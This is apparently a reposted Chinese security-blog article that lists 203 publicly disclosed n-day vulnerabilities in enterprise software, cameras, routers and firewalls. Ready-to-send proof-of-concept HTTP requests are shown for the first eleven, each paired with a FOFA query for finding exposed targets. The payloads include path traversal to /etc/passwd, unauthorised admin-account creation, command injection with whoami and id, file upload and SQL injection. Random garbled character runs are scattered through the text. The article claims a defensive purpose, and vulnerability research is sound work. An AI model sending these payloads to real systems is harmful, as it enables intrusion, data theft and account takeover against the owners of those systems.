互联网公开漏洞整理202309-202406" O" u# u2 k* h# R1 L; Q
道一安全 2024-06-05 07:41 北京
: _ k5 A* i/ K( Y, p以下文章来源于网络安全新视界 ,作者网络安全新视界3 t$ Q3 _9 x4 g% n' z; P* y/ W! F
- h9 @, s( m9 h发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。" V' Z2 o! R! q9 }* O
) K5 ^5 N1 B: d
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。( a5 A5 [+ R0 B3 o# l- ^+ Z
. V( k% p* G% W安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。, X: z0 `: z! W- `1 h
k# p/ s# e. o9 N6 M* R, @( W文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
" {+ U ?2 `2 `; T2 ] _0 |
# Q" E5 y& a d2 Z8 m合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
8 W5 Q! I1 p2 {: \, z" _- P& d- P0 _- Q8 y9 P b+ }
' [5 g1 `( Z7 P( D: _$ ^- g' j声明/ T3 q$ h K7 l+ K& w8 H9 c
0 ~$ n: K: Y4 J% O# M4 a为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
' x' W1 U" b! f/ Y5 w9 c5 \( |$ p
4 P i$ z; M# u& G7 n" V有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。6 P4 Z' A' G# Q
4 F6 X7 ?1 x/ }3 i
8 j- E6 V& z! V, X# K: G% k) ]7 w' s& M& _" c/ _
目录1 t0 N3 a+ |$ m" Q& x# E, c
5 |: `/ v; P3 \! O01
- Z) e- }" X) u
2 K7 A7 q4 _2 Q( @& Z' ]# {/ i1. StarRocks MPP数据库未授权访问
: `2 \* O, r- O3 _" I2. Casdoor系统static任意文件读取# r5 L) q) ?" T3 a
3. EasyCVR智能边缘网关 userlist 信息泄漏5 k* o* a }. W! [0 }$ T
4. EasyCVR视频管理平台存在任意用户添加1 X9 O/ c% C! j, D' @
5. NUUO NVR 视频存储管理设备远程命令执行4 ~9 u" m. {. Q1 h7 u
6. 深信服 NGAF 任意文件读取# c) ^; C9 ~. c5 M5 d& N! N. \
7. 鸿运主动安全监控云平台任意文件下载
/ ^2 `' g# B& n5 R" ~* i/ H% L8. 斐讯 Phicomm 路由器RCE
8 f4 Y P% y- \% l9. 稻壳CMS keyword 未授权SQL注入0 O/ D) @1 k e. A
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ {1 S% B/ k0 G& S
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
' B9 w/ o+ B' _12. Jorani < 1.0.2 远程命令执行
( s. ^9 ]' N/ b% v, N13. 红帆iOffice ioFileDown任意文件读取. w7 b; _3 r; z* v5 m
14. 华夏ERP(jshERP)敏感信息泄露: H1 P% v% |) d2 b
15. 华夏ERP getAllList信息泄露7 Q( F" ~/ d# E% D0 M2 J
16. 红帆HFOffice医微云SQL注入
: n* X5 v) N& V/ P. U17. 大华 DSS itcBulletin SQL 注入
6 B9 M, q8 r( s* x, }8 n18. 大华 DSS 数字监控系统 user_edit.action 信息泄露* x2 A) d9 w* b/ Z' j
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 e) c- Z( z; [& `20. 大华ICC智能物联综合管理平台任意文件读取0 H/ n5 q$ n3 r; c6 H
21. 大华ICC智能物联综合管理平台random远程代码执行
' _! G: M; U2 ], D5 g4 P7 W6 H. ?22. 大华ICC智能物联综合管理平台 log4j远程代码执行9 y# E5 X c1 ]- f0 ], H$ v( v
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
- C! G, }" F( J. j# r: J0 a- s24. 用友NC 6.5 accept.jsp任意文件上传2 S$ z, E' {# s! Q
25. 用友NC registerServlet JNDI 远程代码执行2 v0 j9 q# n9 b9 w0 V4 \
26. 用友NC linkVoucher SQL注入# o1 ?& t% Q: B* ]7 k+ n+ p
27. 用友 NC showcontent SQL注入% {7 t/ w8 Q2 j3 l4 p* `
28. 用友NC grouptemplet 任意文件上传
$ T% k0 x: E+ r1 {29. 用友NC down/bill SQL注入+ w/ ?1 I& [# t+ H
30. 用友NC importPml SQL注入
2 S& Q$ s0 A# k! [; n5 Q31. 用友NC runStateServlet SQL注入1 Y1 M o/ z2 b; B& y' D; O- W
32. 用友NC complainbilldetail SQL注入
6 F" H# y& h: y8 e+ Y' s# I33. 用友NC downTax/download SQL注入% d9 w- W% A8 V- L3 _5 e& K
34. 用友NC warningDetailInfo接口SQL注入7 `+ L: C; k- _% P* E+ X
35. 用友NC-Cloud importhttpscer任意文件上传 o5 {* Q/ p/ \% O* K
36. 用友NC-Cloud soapFormat XXE
: _9 x7 t! c& _37. 用友NC-Cloud IUpdateService XXE& T1 G0 ?) u. [: V, a6 m# s
38. 用友U8 Cloud smartweb2.RPC.d XXE. `$ _1 s7 l; Z; R6 g: ?- e$ s
39. 用友U8 Cloud RegisterServlet SQL注入
4 e% N0 q+ } Y! a1 T, T6 S40. 用友U8-Cloud XChangeServlet XXE
3 J+ \$ c# A. `41. 用友U8 Cloud MeasureQueryByToolAction SQL注入6 k; P5 q) n% G( S6 d
42. 用友GRP-U8 SmartUpload01 文件上传
( p0 ^4 U$ w3 h6 T4 |43. 用友GRP-U8 userInfoWeb SQL注入致RCE# X+ k& K+ |: n" ~3 W( r
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
% x9 p1 Y- O( v: R, m* _4 h45. 用友GRP-U8 ufgovbank XXE7 S) s1 r. N" ^6 Z) y+ u
46. 用友GRP-U8 sqcxIndex.jsp SQL注入/ b$ Y5 t/ m% A1 I" x; n @
47. 用友GRP A++Cloud 政府财务云 任意文件读取 \8 h8 h' ~( q: K' Y8 q+ Z
48. 用友U8 CRM swfupload 任意文件上传
6 m" V* }! |9 q, W& Z: X3 V49. 用友U8 CRM系统uploadfile.php接口任意文件上传8 d% p! ?, ^1 y* H( e" p
50. QDocs Smart School 6.4.1 filterRecords SQL注入1 G/ v2 T9 ^4 f3 |8 \+ B B
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% C8 T7 K" Q3 i: k2 h( Z( v8 ]
52. 泛微E-Office json_common.php sql注入# K) M" R6 Z8 y, q" x
53. 迪普 DPTech VPN Service 任意文件上传
6 c s4 f5 J! D2 O1 x+ z54. 畅捷通T+ getstorewarehousebystore 远程代码执行5 `% B# L8 [! Q
55. 畅捷通T+ getdecallusers信息泄露
& f, b$ s, ~' @) O56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
. p# H) i S0 e) Z) w0 Q. W2 N6 f( I57. 畅捷通T+ keyEdit.aspx SQL注入5 t; z& O* [7 _2 C/ _: ^
58. 畅捷通T+ KeyInfoList.aspx sql注入/ I7 k7 x9 Y4 {; H; d. l, L: T* T
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 i2 i2 I3 k& k' Z) F5 w8 O" @3 e60. 百卓Smart管理平台 importexport.php SQL注入
3 l( N! v1 O n! K D* J61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& ~. z8 w0 D7 ?62. IP-guard WebServer 远程命令执行
- Y5 F7 N% s) k0 W; G63. IP-guard WebServer任意文件读取/ U4 ^# |0 l- H8 K# X7 S' S
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
# Y" \6 P2 s* R+ A8 I65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
% X# I" M/ x& s ]$ S2 W66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
5 h$ L3 _0 E0 B% A; P; V67. 万户ezOFFICE wpsservlet任意文件上传7 ?# K& Y) P; u6 V; a
68. 万户ezOFFICE wf_printnum.jsp SQL注入
4 `$ y) M$ [4 Y$ j69. 万户 ezOFFICE contract_gd.jsp SQL注入
4 {9 u' ~8 Y5 A5 b9 i70. 万户ezEIP success 命令执行
' `3 y2 @* f: c. C71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入, d: n% b% X1 C+ [' R
72. 致远OA getAjaxDataServlet XXE
3 U+ p" \+ C: ] ~! S73. GeoServer wms远程代码执行
3 u; K. A# f. b; e74. 致远M3-server 6_1sp1 反序列化RCE) V L$ R5 t6 B( `
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE8 g) H. b. c& h" ~5 o% I5 j
76. 新开普掌上校园服务管理平台service.action远程命令执行+ z2 ?9 ~4 m6 Z$ {6 b n5 ^3 j6 e
77. F22服装管理软件系统UploadHandler.ashx任意文件上传( A5 M9 g+ T+ {5 T" i4 h8 @2 |
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
1 M v0 |) h6 E( }$ K79. BYTEVALUE 百为流控路由器远程命令执行
f& {$ R/ a$ L80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# S2 B3 U5 k3 m3 e6 i9 e81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
6 n' V0 M# k) _* f6 m82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
& y @( t% A; F/ w# t83. JeecgBoot testConnection 远程命令执行
6 ]! B5 z- M' ^! h2 `84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
/ O9 H' w2 w( g' ~& ]85. SysAid On-premise< 23.3.36远程代码执行+ ]/ y5 l/ Q1 v& H! T$ @/ u/ m/ t& [
86. 日本tosei自助洗衣机RCE* F9 `$ o: U9 H2 _/ B' G$ u
87. 安恒明御安全网关aaa_local_web_preview文件上传2 {& C8 U) u, ?: C w8 I) ~
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
d& N+ e$ ?0 Z' I- v89. 致远互联FE协作办公平台editflow_manager存在sql注入7 R+ }$ c8 K0 B' h
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
& [$ J9 k6 L/ H) D% B91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
. l& d E8 K$ |0 i3 X* a92. 海康威视运行管理中心session命令执行8 r$ d. A* S7 Y. ~+ h6 d
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传6 ]8 m. K% [6 ?+ r" \* E
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传1 o& n- ?& O2 Z4 }2 `2 w: _
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行" `, G' l( P( C5 c- ` ^: ?3 Y
96. Apache OFBiz 18.12.11 groovy 远程代码执行
- f; \( F8 R& a1 r* ]+ g97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
: O- {5 G5 ]3 P: j98. SpiderFlow爬虫平台远程命令执行4 F. X% y9 L5 X1 t
99. Ncast盈可视高清智能录播系统busiFacade RCE
" L0 ^7 o" v5 [100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传1 x8 ?+ v3 T4 _
101. ivanti policy secure-22.6命令注入
2 `" |3 r( t* N0 ?$ J102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
4 ?8 m. V( a; G103. Ivanti Pulse Connect Secure VPN XXE: s% C8 }$ K8 ^4 ?9 r8 ?
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露5 \9 ~ e- Y1 a9 L' D5 y
105. SpringBlade v3.2.0 export-user SQL 注入. b- ^( M! U$ S
106. SpringBlade dict-biz/list SQL 注入
) Q F5 ^: @7 s107. SpringBlade tenant/list SQL 注入
6 c. R5 l; H, N$ j. V F: ~0 f- f108. D-Tale 3.9.0 SSRF) P8 h1 T$ k! K6 N/ u6 p8 Q5 b
109. Jenkins CLI 任意文件读取
$ B2 n z' P& W. G6 c110. Goanywhere MFT 未授权创建管理员7 z9 g3 i% D! j. ^6 @+ u
111. WordPress Plugin HTML5 Video Player SQL注入* o* h0 V: X6 q( Z8 V' F" X
112. WordPress Plugin NotificationX SQL 注入; c; b) w& Y- J; i$ X6 g/ h
113. WordPress Automatic 插件任意文件下载和SSRF
% l$ C7 [" R' R3 N114. WordPress MasterStudy LMS插件 SQL注入9 b; ^: f( {6 U% n% z# }% P
115. WordPress Bricks Builder <= 1.9.6 RCE4 H5 v6 S+ N3 w1 ]6 g
116. wordpress js-support-ticket文件上传
# N9 |. q4 C, V& Y117. WordPress LayerSlider插件SQL注入
; D8 H1 J _) ]: r0 U3 i6 x118. 北京百绰智能S210管理平台uploadfile.php任意文件上传* J7 S* w% L, v! H, f2 i
119. 北京百绰智能S20后台sysmanageajax.php sql注入
) x+ S; C1 c7 W6 L0 i& ~120. 北京百绰智能S40管理平台导入web.php任意文件上传& ~9 j! N+ P( a- O& ? B3 u
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ ?; J1 D' K& {( ^/ c" `9 L; b122. 北京百绰智能s200管理平台/importexport.php sql注入- R5 {+ _' q, p
123. Atlassian Confluence 模板注入代码执行
1 h2 e% W$ i9 n. a) V( n124. 湖南建研工程质量检测系统任意文件上传
' {: X5 ?5 S, D/ t P125. ConnectWise ScreenConnect身份验证绕过
c) `8 t6 k$ Q; U126. Aiohttp 路径遍历
( P4 L4 _; X. k1 A: H' h127. 广联达Linkworks DataExchange.ashx XXE
" u7 t" s1 d! k128. Adobe ColdFusion 反序列化
0 l' I( n; z A129. Adobe ColdFusion 任意文件读取
. o n: A/ i3 ` P. Y0 S8 l130. Laykefu客服系统任意文件上传" R) y4 I( W. {* L3 j; X9 G
131. Mini-Tmall <=20231017 SQL注入( r5 V* ~: C9 m5 l1 y% @
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, T4 d+ F! F `9 L, _9 \" b
133. H5 云商城 file.php 文件上传% E# I+ r8 \$ N M t+ b
134. 网康NS-ASG应用安全网关index.php sql注入5 j' M$ v) A' i# O2 j8 }9 \
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
+ u. `# G& { R- Z136. NextChat cors SSRF( i$ v: ~- H% N* G; q, d
137. 福建科立迅通信指挥调度平台down_file.php sql注入
. h5 W& }& d. ^. E7 X4 h138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
" ]; `! Y1 {* o' A6 S139. 福建科立讯通信指挥调度平台editemedia.php sql注入
' {8 U8 g+ Z- k. v140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入& h# E d. A A# h7 w! n0 T7 ]( u
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
7 p! u' t; I* |+ O1 C5 ]" W142. CMSV6车辆监控平台系统中存在弱密码2 F$ {. s" J- W, r# d. [" M% O
143. Netis WF2780 v2.1.40144 远程命令执行
& [: \- N" r1 G j; ~6 e144. D-Link nas_sharing.cgi 命令注入
# |$ F) K/ v0 T2 B W$ Z145. Palo Alto Networks PAN-OS GlobalProtect 命令注入1 I1 a) {1 L2 t# y- `
146. MajorDoMo thumb.php 未授权远程代码执行3 H2 E+ w: U, F0 u% ^1 Q# ~
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历+ g) p9 x/ e* r/ ^
148. CrushFTP 认证绕过模板注入
- p8 F* m+ b; ~! S0 i% `1 r149. AJ-Report开源数据大屏存在远程命令执行
: ]$ o6 c1 P3 b' }150. AJ-Report 1.4.0 认证绕过与远程代码执行% n7 j( [4 J3 s% {* |" F; f* \
151. AJ-Report 1.4.1 pageList sql注入
. U9 p0 K# I( j4 q7 } ~152. Progress Kemp LoadMaster 远程命令执行: g' m' u( V. {
153. gradio任意文件读取9 C8 a* U0 z7 C+ _ W+ j
154. 天维尔消防救援作战调度平台 SQL注入
, o/ K5 {# n4 A' l1 W/ C5 O155. 六零导航页 file.php 任意文件上传" A5 W3 I- b. {1 B
156. TBK DVR-4104/DVR-4216 操作系统命令注入
* B# w% I, u3 g4 S157. 美特CRM upload.jsp 任意文件上传 p$ ]$ t M$ b T' U1 s* f' S
158. Mura-CMS-processAsyncObject存在SQL注入 \, l4 _/ P I7 r
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
, `6 a+ ?) q+ A; ]+ H9 T I' c160. Sonatype Nexus Repository 3目录遍历与文件读取; D7 v f6 ?! x% W3 c- p( J) E. k
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
5 W* d) s2 @8 d/ W162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传# X3 E3 G! S1 O" C
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 w$ E! O" L/ k9 m/ @
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ c0 v7 n# l- S, V' E# b8 ^
165. OrangeHRM 3.3.3 SQL 注入
$ [ |8 G3 s$ S1 q8 d* E; T166. 中成科信票务管理平台SeatMapHandler SQL注入
* R6 k0 z- g. G! E) M, k! R$ _167. 精益价值管理系统 DownLoad.aspx任意文件读取
2 I, m- b& N0 ]+ ^3 Q168. 宏景EHR OutputCode 任意文件读取; ?* ^7 X3 C3 u% W
169. 宏景EHR downlawbase SQL注入
- G# G* ~+ R: V! ~& ^170. 宏景EHR DisplayExcelCustomReport 任意文件读取
4 @& {7 Y$ J+ @. `. Q171. 通天星CMSV6车载定位监控平台 SQL注入
! l1 ?* U+ b, _0 ]( _172. DT-高清车牌识别摄像机任意文件读取( r/ }" f, l" w0 `9 w
173. Check Point 安全网关任意文件读取
) Q4 q* w- l) Q# w4 T174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 V( |3 \3 q. V0 ]2 O0 ?6 _# F7 g175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
8 D5 J" u. X% s176. 电信网关配置管理系统 rewrite.php 文件上传
9 l+ H! S7 T( W7 j! F177. H3C路由器敏感信息泄露
) d& `4 v3 ?. D6 r. X k8 g178. H3C校园网自助服务系统-flexfileupload-任意文件上传5 s( B0 Y3 n5 }0 [- Y: K
179. 建文工程管理系统存在任意文件读取
3 D+ }5 S1 ]5 ~, D# I180. 帮管客 CRM jiliyu SQL注入
6 ^. x1 ]! Q. I Z5 D( W181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; [$ r0 ~7 r4 r3 Y
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建) l$ I+ Q+ w" c( r
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入& T8 z" `+ E" }- `1 n
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
7 S4 g# A- o4 \2 l9 A; K185. 瑞友天翼应用虚拟化系统SQL注入0 R( Y/ O5 ]9 l, c& H6 e
186. F-logic DataCube3 SQL注入
& V& w" g& X# ?7 l- X: k* W _: c' I187. Mura CMS processAsyncObject SQL注入
3 @# b0 W: ?. w% v( L4 l188. 叁体-佳会视频会议 attachment 任意文件读取
; N. r' n- @6 S( ~9 O189. 蓝网科技临床浏览系统 deleteStudy SQL注入
x% L0 U' Z4 w190. 短视频矩阵营销系统 poihuoqu 任意文件读取1 ~5 l+ i1 s& ^: {3 ` X2 a! i; z( B
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
j# ?, l" u; P; k$ ^1 \! z5 h5 m192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
# y. @. c2 |6 x9 Z' R" K193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行3 _) e$ y/ _ j% s: W# Y- J
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
( Z9 H: ]( e; U/ K195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
* {4 P! n9 ^5 Y5 w% }& R196. 河南省风速科技统一认证平台密码重置
$ Q/ Z" y7 _6 g197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
% k7 Y; m' ~8 ~! V, L8 R! Q: w8 A; y198. 阿里云盘 WebDAV 命令注入
3 `' V. b) b* g- e& r1 ]& D199. cockpit系统assetsmanager_upload接口 文件上传
7 V. y# j' [, m8 p200. SeaCMS海洋影视管理系统dmku SQL注入
1 R/ S8 T0 u2 j" S$ x1 f201. 方正全媒体新闻采编系统 binary SQL注入7 G& _) C% T( E" Q% i7 e
202. 微擎系统 AccountEdit任意文件上传
4 X; q0 B& E7 E203. 红海云EHR PtFjk 文件上传
5 R3 R" m! D; G7 n
' x2 F, K9 e9 E5 `2 rPOC列表
' c1 V$ G1 p! w8 x# [2 }' B4 ^) w* R) _/ Q
02
1 ~7 [# t9 P' g$ D8 f6 r3 i! y5 _, Y- X6 x: ?
1. StarRocks MPP数据库未授权访问7 X, }7 W6 P }. p- O+ h' {
FOFA :title="StarRocks"8 k5 ~' \$ M/ d. ?( H6 j. c
GET /mem_tracker HTTP/1.1
6 ^2 @0 s/ s, K8 kHost: URL0 I9 n: u7 Z$ H* c
, H9 ~- l8 B+ r, {% g# ]
7 ~0 s: @ `( d6 Z) P- e
2. Casdoor系统static任意文件读取% n) a! N) l: d: n1 B/ ~
FOFA :title="Casdoor"
9 q; w8 H* D; ^/ m7 B( {4 h# \GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1) | A7 J B$ j7 J4 f1 G- c3 l/ d6 u
Host: xx.xx.xx.xx:9999; q; `5 k) s5 o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 h: M: h. G" l
Connection: close- ^! `5 D* h9 n' Y
Accept: */*
% A5 f5 B: Q- o0 g2 PAccept-Language: en
4 o! T4 \! M; L- u/ hAccept-Encoding: gzip3 J0 z( o& E: [! Y' D0 Q
) ]- I9 K f/ D3 Y* N0 Z; P1 T# ^: N5 g4 L* r) j
3. EasyCVR智能边缘网关 userlist 信息泄漏! j: ~+ c' M. t! f: F! V
FOFA :title="EasyCVR"
' }% ^0 F* l$ f' e, A, a1 g* SGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
2 N1 i- B' r8 U1 W, V/ LHost: xx.xx.xx.xx! V( v+ L, U5 ^8 x
Z7 {! V% T0 o' k$ v: D" g- k$ b4 {0 d
4. EasyCVR视频管理平台存在任意用户添加
- U' h2 N! M- J2 ]FOFA :title="EasyCVR"
/ A2 W, C& o) o9 W9 x; {$ T
# f/ L; O/ q5 Dpassword更改为自己的密码md5, O8 R& F0 r9 P3 v
POST /api/v1/adduser HTTP/1.1
$ K7 G& X- o1 k- h/ p- \Host: your-ip+ `! t2 H" J4 s2 C$ R- v8 z
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
0 a2 Y* P. ]& H- l2 n) B* K
M9 O" ?# U- f* b- oname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
; \ `% \' `& |/ V. y9 O- A( R3 K4 k
5 h, z3 D$ {* l% r* H5 M
+ G2 K S; O9 E! R1 @( L" c5. NUUO NVR 视频存储管理设备远程命令执行% Y% r7 A, L$ h7 B
FOFA:title="Network Video Recorder Login"- v* m( A$ h: b- s* X* V
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1. h! } E2 e; p; X. j i
Host: xx.xx.xx.xx( M9 t& D; x1 S* V, n( q# m
8 K. c% i& E' S
' Q8 I0 l0 C1 Y3 C1 X+ c" c# d6. 深信服 NGAF 任意文件读取( i+ r/ D. P0 _; ]" W
FOFA:title="SANGFOR | NGAF"4 n) T, @" n0 H2 B/ p
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
& y$ v) R4 y3 G6 sHost:" a1 ?3 f$ C/ d6 C& H3 l5 f
7 ^/ n9 M# l8 i7 U1 L. f+ J: W% P; _0 u( `+ k8 q& C5 F
7. 鸿运主动安全监控云平台任意文件下载
. B) \% K$ H* E q9 IFOFA:body="./open/webApi.html", d8 J3 d1 \& Q! f! U
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1% D5 a) \3 j( c W$ I. @
Host:
2 L e# [' U& ]% ?: A/ P8 u$ n0 \% U4 c* u, B1 p |
& M9 `' n% o n+ d8. 斐讯 Phicomm 路由器RCE
9 ^3 g: W# z0 O( x! I8 DFOFA:icon_hash="-1344736688"1 T, n6 u* P* T: s% \! Y9 f' S+ ]9 F
默认账号admin登录后台后,执行操作
( p; ]5 r9 m# `" ZPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.10 N( ` o J) d
Host: x.x.x.x1 f% f6 X X) G4 I& M1 N
Cookie: sysauth=第一步登录获取的cookie$ h! W6 j$ M! i' }1 S4 V/ W- x7 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz5 h: P: H4 w! l8 E! p& T) _+ J
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
. M0 w9 u( i3 E0 ^8 b8 k+ ~* r$ l7 {+ z) f8 F
------WebKitFormBoundaryxbgjoytz8 w9 L$ }7 n" q8 v g7 u
Content-Disposition: form-data; name="wifiRebootEnablestatus"
. V# t) }5 Y3 g" L9 w0 Y
: W8 s; `/ v' p# j%s
7 ?: g" T" P0 l+ o------WebKitFormBoundaryxbgjoytz
% m7 @1 n3 q6 A; A2 o$ F( vContent-Disposition: form-data; name="wifiRebootrange"5 S" l: _" u2 P/ _4 n P8 M
) N2 G/ o2 i& n( k
12:00; id;
- ~( y" C2 B7 o! O: ?0 D------WebKitFormBoundaryxbgjoytz
: B- R* w" q$ u5 t' u% s* G4 uContent-Disposition: form-data; name="wifiRebootendrange"
) z3 V n0 K0 A& U
& @" e' Q( h( `) i%s:9 d. p* Y0 ~2 i
------WebKitFormBoundaryxbgjoytz
- x' C+ M+ b; f5 C% B7 `Content-Disposition: form-data; name="cururl2"
6 a! d0 v: l: F9 u; K- ^9 K9 @& A$ f, e3 w) Z# q* K5 o6 I( R8 @
" d7 u M2 S8 P# g; z------WebKitFormBoundaryxbgjoytz--
/ r) I6 x$ j! b) \4 i
' b0 i) |% a/ X& ?8 N( u( A8 q
; P& Z+ b- R1 v: \9. 稻壳CMS keyword 未授权SQL注入" s# B: t9 z! q, y- B9 \( p% ~
FOFA:app="Doccms"
, w$ E( u# D- @, |9 N1 KGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
& K. w0 a9 B1 t+ w: i0 R' D* z* SHost: x.x.x.x8 v3 P3 u' g6 x2 u% l$ f
' S# Z( I2 u9 r0 f- e) u8 V
" B& p, T: t0 V( x$ j
payload为下列语句的二次Url编码
+ a3 H; b+ }3 F& Z* Q# N x0 F: x$ Q
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#5 N) I& u& u1 O. i+ i! w* V
# S' z% J1 a/ u- }
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传" L3 w8 u8 V: X' I: t
FOFA:icon_hash="953405444"2 v2 Q9 N! X( h
) W. g: k$ c0 }- N$ l# N4 q" r文件上传后响应中包含上传文件的路径
" n6 Z: Q: G" _% ?, C0 kPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
" z, {5 p' r mHost: x.x.x.x:xx
9 X; _/ |: E& V: C/ s) M6 c7 u# KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
8 |0 K# W+ p2 ^ kContent-Length: 197
3 i! |- i) W' P8 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: V* ?! q: P) K! ^6 [
Accept-Encoding: gzip, deflate# Y0 u5 N4 T, |) Y% C5 U' v* Q
Accept-Language: zh-CN,zh;q=0.95 A* `# p7 V7 P N4 m; Y/ i! I- R
Connection: close
2 z. q: b" ]( _4 w" Y, T/ NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu: O1 @2 l- h; y4 \
4 @- w+ [5 @, K) U4 q! @4 `8 U------WebKitFormBoundaryxdgaqmqu
. K- A0 T; d( x. y0 C4 }Content-Disposition: form-data; name="file"filename="icfitnya.txt"
: k& r7 X. R& t M! y8 c; d0 tContent-Type: text/html! y6 n& X# F- e* w& K
$ k2 D! `8 e" Z0 }2 sjmnqjfdsupxgfidopeixbgsxbf2 y' W& C% r# E5 R: ]7 S# D; y9 _
------WebKitFormBoundaryxdgaqmqu--
* \" P. W/ {+ G: W
! `: H1 s. W- r$ c+ u% I
7 M0 R. v: p* h% h e11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入5 ]! m; y8 g; ?( [+ r9 z
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"9 Z* n1 y& N. t4 r7 l. w
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1; ?% n; a# ^# z1 a8 K
Host: 127.0.0.10 ^* O. x0 D' q* Q0 M$ @0 @
Pragma: no-cache; A A% c" B3 `! m5 i
